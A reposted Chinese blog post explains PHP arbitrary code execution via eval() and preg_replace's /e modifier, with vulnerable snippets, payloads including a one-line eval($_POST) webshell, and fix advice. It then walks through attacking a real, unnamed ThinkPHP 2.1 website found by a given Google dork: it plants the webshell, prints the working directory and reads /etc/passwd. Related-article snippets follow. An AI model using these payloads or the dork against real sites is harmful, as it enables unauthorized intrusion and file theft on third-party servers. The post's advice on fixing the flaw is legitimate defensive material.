phpinfo函数无法执行_【精品转载】“任意代码执行漏洞”实例测试

最新推荐文章于 2023-03-14 15:06:17 发布
最新推荐文章于 2023-03-14 15:06:17 发布
阅读量263 收藏
点赞数 1
文章标签: phpinfo函数无法执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39694264/article/details/111653273
版权
本文介绍了PHP中的任意代码执行漏洞,包括其概念、存在的原因、常见函数、漏洞利用方式、修复方案以及实例测试。重点讲解了eval()和preg_replace()函数的危险用法,并提供了测试和防护建议。
摘要由CSDN通过智能技术生成

0x00 什么是任意代码执行

  • 当应用在调用一些能将字符串转化成代码的函数(如PHP重的eval)时,没有考虑用户是否能控制这个字符串,将造成代码注入漏洞。狭义的代码注入通常指将可执行代码注入到当前页面中,如PHP的eval函数,可以将字符串代表的代码作为PHP代码执行,当用户能够控制这段字符串时,将产生代码注入漏洞(也称命令执行)。广义上的代码注入,可以覆盖大半安全漏洞的分类。

0x01 为什么存在任意代码执行

  • 几种常用函数语言,都有将字符串转化成代码去执行的相关函数。

  • PHP ===> eval( ),assert( )

  • Python ===> exec( )

  • Asp ===>

0x02 为什么使用执行代码函数

  • 应用有时候会考虑灵活性、简洁性,在代码中调用eval之类的函数去处理。

function string2array(%data){    if($data == '')        return array();    @eavl("\$array = $data");    return $array;}//当 $data 接受的字符串是这样时:$data = "array(    'upload_maxsize' => '2048',    'upload_allowext' => 'jpg|jpge|gif|bmp|png|doc|docx|xls|xlsx|ppt|pptx|pdf|txt|rar|zip|swf',    'watermark_enable' ==> '1',    )"//通过eval()函数就可以将字符串‘array(....)’作为数组赋值给$array,这样会大大的提升代码的灵活性和简洁性。

0x03 漏洞分类

  • eval()、assert()  (不常见)

  • preg_replace + /e 模式

0x04 漏洞利用(本地测试)

  • eval() ==>

#1:<?php $data = $_GET['data'];eval("\$ret = $data;");echo $ret;/*    payload:        ?data=phpinfo()        ?data=1;phpinfo()        ?data=${phpinfo()}        ?data=${@eval($_POST[x])}  #一句话木马,可以用菜刀连接*/ ?> #2:<?php $data = $_GET['data'];echo "\$ret= '$data'";eval("\$ret = strtolower('$data');");echo $ret;/*    payload:        ?data=');phpinfo();//        ?data=');@eval($_POST[a]);//*/ ?> #3:<?php $data = $_GET['data'];eval("\$ret = strtolower(\"$data\");");echo $ret;/*    payload        ?data={${phpinfo()}}        ?data=1");phpinfo();//        ?data=${@eval($_POST[x])}*/ ?>

  • preg_replace() ==>

<?php $data = $_GET['data'];echo $data;preg_replace('/(.*)/e', '$ret = "\\1";',$data);echo $ret;/*    payload:        ?data=${phpinfo()}    注:PHP 5.5.0 /e 修饰符已经被弃用*/ ?>

0x05 修复方案

  • eval() ==>

  • 能使用json保存数组、对象就是用json,不要将PHP对象保存成字符串,否则读取的时候就需要使用eval

  • 对于必须使用eval的情况,一定要保证用户不能轻易接触eval的参数(或用正则严格判断输入的数据格式)。

  • 对于字符串,一定要使用单引号包裹可控代码,并在插入前进行addslashes

  • $data = addslashes($data)

  • eval("\$data = eval('$data');")

  • preg_replace() ==>

  • 放弃使用preg_replace的/e修饰符

  • 使用preg_replace_callback()替换

  • 如果必须使用preg_replace()+e修饰符,请保证第二个参数中,对于正则匹配出的对象,用单引号包裹

0x06 实例测试

  • 前面说了一大堆理论,现在来找个实例实际测试下。(本来想把网址公开的想想还是算了,这个漏洞的破坏性还是挺大的,就不公开了,我也怕“从web安全到派出所”......)

  • 尽管不会公开网址,但是还会告诉大家怎么去找这种存在 任意代码执行 的网站

  • ok,下面开始一步一步去实现漏洞的利用

  • 任意代码执行漏洞的存在环境:thinkphp 版本:2.1

  • google hacking 也就是谷歌搜索啊: 

intext:thinkphp intext:"Fast & Simple OOP PHP Framework"intext:"2.1"

  • 目标站点url:http://www.xxxxxx.com/xxxx/id/43.html

为什么thinkphp这个版本存在 任意代码执行 漏洞,出现漏洞的代码是什么我在这就不提了,大家有兴趣的可自行百度。

  • 测试目标url:按照上面说的我们先来测试看看时候存在任意代码执行

65e560b879ab73edc6f698f5bb4606ca.png

  • biubiubiu.....存在代码执行漏洞

  • 直接上一句话吧.....

  • id/{${@eval($_POST[x])}}.html

07d9e719d8430c74d75d4b526d22c219.png

  • 返回当前路径:id/{${exit(print(getcwd()))}}.html

解释下这句:getcwd() 返回当前工作路径            print()  打印一下            exit()   停止加载,网站停止渲染只会显示当前工作路径

  • 读取文件:

  • id/{${exit(var_dump(file_get_contents($_POST[f])))}}.html

  • f=/etc/passwd

a2d7dd1aad45ed063b7829256fcbd124.png

  • ok,现在利用完毕

  • 本文有什么不对的地方,欢迎大家指正

  • 欢迎大家交流学习

  • 希望大家只用来做测试,不要搞破坏

文章转载:bbs.ichunqiu.com

8cec26b91838ee38e110ecbc953aa633.gif

weixin_39694264
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpinfo函数无法执行_【代码审计】深入研究preg_replace与代码执行
weixin_39616003的博客
12-21 258
文档分类: 漏洞利用,代码审计内容目录前言案例细节分析1:正则的反向引用细节分析2:非法字符被转换细节分析3:可变变量前言本文将深入研究preg_replace /e模式下的代码执行问题,其中包括preg_replace函数执行过程分析、正则表达式分析、漏洞触发分析,当中的趣味非常多,相信看完本文,你一定会有所收获。案例下面先看一个案例,思考如何利用此处的preg_repl...
随笔4
Rainbow_Melo
08-20 287
关于preg_replace的/e修饰符 在php中,双引号里面如果包含有变量,php解释器会将其替换为变量解释后的结果;单引号中的变量不会被处理。 注意:双引号中的函数不会被执行和替换 payload:\S*=${phpinfo()} nginx配置文件 配置文件存放目录:/etc/nginx 主配置文件:/etc/nginx/conf/nginx.conf 配置文件目录为:/usr/local/nginx/conf/nginx.conf 程序默认存放位置:/usr/share/nginx/html 日志
SQL基本常用语句--增删改查(CRUD)
别当程序员的博客
11-05 393
数据库CRUD
phpinfo()函数(常用)
热门推荐
lituxiu的博客
04-16 5万+
phpinfo()函数 phpinfo函数可以显示出PHP 所有相关信息。是排查配置php是是否出错或漏配置模块的主要方式之一!代码如下 : <?php phpinfo(); ?> 只要访问到phpinfo()函数的web页面,即返回php的所有相关信息...
PHPphpinfo()代码审计
qq_60115503的博客
04-26 2735
PHP为我们提供了一个内置函数phpinfo(),它可以提供有关系统中安装的PHP版本和PHP配置的详细信息。那么如何使用phpinfo()函数?下面本篇文章就来带大家了解一下phpinfo()函数的使用,希望对大家有所帮助
phpinfo 系统查看参数函数代码
10-29
代码中包含了一些简单的性能测试,例如测试整型运算速度 (`test_int()`)、浮点型运算速度 (`test_float()`) 和 I/O 操作速度 (`test_io()`), 这些函数未在给出的代码中定义,可能在其他部分实现。此外,还有一个...
深入研究PHP中的preg_replace和代码执行
10-18
这也是为什么能够执行payload中${phpinfo()}的原因,因为${phpinfo()}会被解析成phpinfo()函数的调用。 最后,文章通过一系列的payload示例来展示在不同情况下,代码执行的结果。这些示例表明,只有在正确的构造和...
02命令执行代码注入漏洞.pptx
09-23
命令执行代码注入漏洞是网络安全领域中的重要话题,它们源于应用程序设计时未能妥善处理用户输入,使得恶意用户可以通过控制输入参数来执行系统命令或者注入代码,从而对系统造成潜在的危害。下面将详细阐述这些...
phpinfo_feathersllf_zip_php_
09-30
这对于调试、优化代码或检查服务器是否满足特定扩展需求非常有用。 当我们运行`phpinfo.php`这个脚本时,它会在浏览器中以表格形式展示以下关键信息: 1. PHP版本:显示正在运行的PHP解释器的版本。 2. 模块信息:...
PHPInfo()信息泄漏漏洞利用及提权
weixin_44023460的博客
12-08 3万+
Simeon PHPInfo函数信息泄露漏洞常发生一些默认的安装包,比如phpstudy等,默认安装完成后,没有及时删除这些提供环境测试的文件,比较常见的为phpinfo.php、1.php和test.php,虽然通过phpinfo获取的php环境以及变量等信息,但这些信息的泄露配合一些其它漏洞将有可能导致系统被渗透和提权。 1.1phpinfo函数 PHP中提供了PHPInfo()函数,该函数返...
phpinfo()是什么
最新发布
m0_56153073的博客
03-14 3386
运行该代码后,会输出一个包含 PHP 运行环境配置信息的 HTML 页面,其中包括了 PHP 的版本、编译器信息、模块信息、配置信息等。是 PHP 中的一个函数,用于显示 PHP 运行环境的配置信息。该函数可以显示 PHP 的版本信息、编译器信息、模块信息、配置信息等,可以帮助开发者了解 PHP 的运行环境和配置信息。函数可以显示 PHP 运行环境的详细信息,因此在生产环境中使用该函数需要格外小心,确保不会泄露敏感信息。通常情况下,建议在开发环境中使用该函数来了解 PHP 的运行环境信息。
【vulhub漏洞复现】Thinkphp 2.x 任意代码执行
RexHa的博客
02-28 2500
当preg_replace使用了/e模式,可以导致代码执行。该函数的正则规则和目标字符可以由用户进行输入。preg_replace 函数在匹配到符号正则的字符串时,会将替换字符(第二个参数)当做代码执行。在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由,导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
漏洞在线利用php源码,ThinkPHP系列漏洞之ThinkPHP 2.x 任意代码执行
weixin_31430653的博客
03-22 212
ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架,这个框架曾经爆出各种RCE和SQL注入漏洞。斗哥将带来ThinkPHP各个版本的漏洞分析文章,此为第一篇从TP最早的版本开始分析。0x00 漏洞描述在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$d...
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2330
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
phpinfo函数无法执行_再谈 zzzcms 代码执行,你也能审计出来的高危漏洞
weixin_39631350的博客
12-21 298
本文作者:sher10ckzzzcms 的后台模板处的命令执行可以说是这套 CMS 比较典型的漏洞了,很久之前自己跟踪过一遍漏洞代码,最近又拿起来玩了玩,发现自己也能够审计到这个漏洞点,整个漏洞审计的过程也很简单,没有啥骚操作。下面我就会按照审计的思路,而并非漏洞分析的思路,给大家说说我是如何通过自己的努力审计出这个命令执行漏洞的cms 下载地址:https://yunpan.360.c...
PHP无法执行 phpinfo()
chenxun1522的博客
07-22 1638
问题现象: 安装完毕PHP之后,执行phpinfo() 发现页面无法打开 查看apache的error.log信息,发现报错: [Sun Apr 25 13:40:37 2010] [error] [client 192.168.0.145] PHP Warning:phpinf...
php 访问phpinfo,PHP无法执行 phpinfo()
weixin_39958019的博客
03-10 1097
问题现象:安装完毕PHP之后,执行phpinfo() 发现页面无法打开查看apache的error.log信息,发现报错:[Sun Apr 25 13:40:37 2010] [error] [client 192.168.0.145] PHP Warning:phpinfo() has been disabled for security reasons in /usr/local/apach...
关于搭建iis后无法解析php文件解决方法
qq_40495877的博客
04-29 1379
在我们安装IIS后,在网页端打开php文件或asp文件,可能就直接下载了,因为解析不了。 在我们搭建的网址上: 点击处理程序映射————右上:添加模块映射 可执行文件是你版本中的php-cgi.exe文件 前提:下载了php文件或者把phpstudy中的php复制过来。这里要注意版本一致 这里可能安装的时候没有安装FastCgiModule模块,百度搜索下重新安装就好了。 操作完后:点击 点击编辑: 环境变量设置: 监视对文件的更改设置:选中你php对应版本中的p.
php代码审计通读全文,通读全文进行代码审计
weixin_30216669的博客
03-29 131
若是想快速找到漏洞,那么就根据危险函数回溯到变量,去进行审计。若是想找到精彩的漏洞,那就要通读全文,理解逻辑。通读全文的技巧:1.找函数集文件,往往函数集文件里面都包含通用函数。因此,可以在index.php文件或者一些功能性文件头部找到。2.找配置文件,通常有config关键字,通过这个文件能了解程序的小部分功能,并且,如果配置文件中的参数以双引号括起来,那么就可能存在代码执行漏洞。只要我们在修...
骑士CMS 6.0.48前远程代码执行漏洞利用详解
这个漏洞允许攻击者在骑士CMS的环境中执行任意代码,通过一系列步骤进行恶意操作。以下是漏洞的具体流程: 1. **注册与登录**:攻击者首先通过前台注册一个普通用户账号,这一步是为了获得访问后台的功能。 2. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值